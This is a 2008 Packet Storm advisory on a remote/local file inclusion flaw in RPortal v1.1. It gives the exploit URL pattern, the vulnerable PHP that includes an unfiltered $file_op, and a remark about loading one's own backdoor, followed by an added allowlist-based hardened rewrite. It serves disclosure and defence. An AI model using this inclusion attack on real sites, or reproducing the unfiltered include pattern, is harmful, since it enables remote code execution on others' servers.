rportal-rfilfi.txt

Date: 01 Oct 2008
Reported by: Kad
Type: packetstorm
Source: packetstormsecurity.com

RPortal v1.1 content management system, Remote and Local File Inclusion Vulnerabilit


Code
```
#########################################################
#
# RPortal v1.1
#
#
# Rportal is a management system of contents simple and powerful Web,
# enabling you to create your site in a few minutes, while profiting
# from a complete and effective administration.
#
#
# Remote and Local File Inclusion Vulnerability <= 1.1
# Found the 29th September 2008

##########################################################
# Author: Kad
#
# mail : kadfrox [ a ] gmail [ dot ] com
#
##########################################################
#
# script : RPortal v 1.1
# http://www.rportal.org/?op=download&fid=36
#
##########################################################

[~] Exploit :


http://www.site.com/index.php?file_op=[url]

#
# Vulnerable code source :
#

if(!isset($file_op))$file_op='';

if($file_op!="")

{
$op_basepath = trim(strrev(strstr(strrev($file_op),"/php/")));

if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath);

include($file_op);

}

# The problem is that the variable $file_op is not filtered
# Then, you can put the link that you want, like your own backdoor
# and execute commands.
```
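A hardened form of the `include($file_op)` pattern shown in the advisory, as an added example that is not RPortal's code or the advisory author's. It assumes the modules live under one directory; `OPS_DIR`, `ALLOWED_OPS`, `resolve_file_op()` and the module names are hypothetical.

```php
<?php
// Added example, not RPortal code. OPS_DIR, ALLOWED_OPS and the entries
// below are hypothetical names chosen for illustration.
declare(strict_types=1);

const OPS_DIR = __DIR__ . '/ops';

// Request value => file relative to OPS_DIR. The request never supplies a
// path, only a key, so nothing outside this table can reach include.
const ALLOWED_OPS = [
    'news'     => 'news/php/index.php',
    'download' => 'download/php/index.php',
];

/**
 * Map a request-supplied operation name to an absolute path inside OPS_DIR.
 * Returns null for anything that is not an exact allowlist key.
 */
function resolve_file_op($requested): ?string
{
    // Arrays, URLs, "../" sequences and wrapper schemes never equal a key.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_OPS)) {
        return null;
    }
    $base = realpath(OPS_DIR);
    $path = realpath(OPS_DIR . '/' . ALLOWED_OPS[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or module file missing on disk
    }
    // Defence in depth: after symlink resolution the file must still sit
    // under OPS_DIR, in case an allowlisted entry is later replaced.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Read the parameter explicitly from the query string instead of relying on
// a global $file_op being populated from the request.
$target = resolve_file_op($_GET['file_op'] ?? null);
if ($target === null) {
    http_response_code(400);
    exit('Unknown operation');
}
// php.ini "allow_url_include = Off" additionally blocks the remote case,
// but not local inclusion, so it complements the allowlist, not replaces it.
include $target;
```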
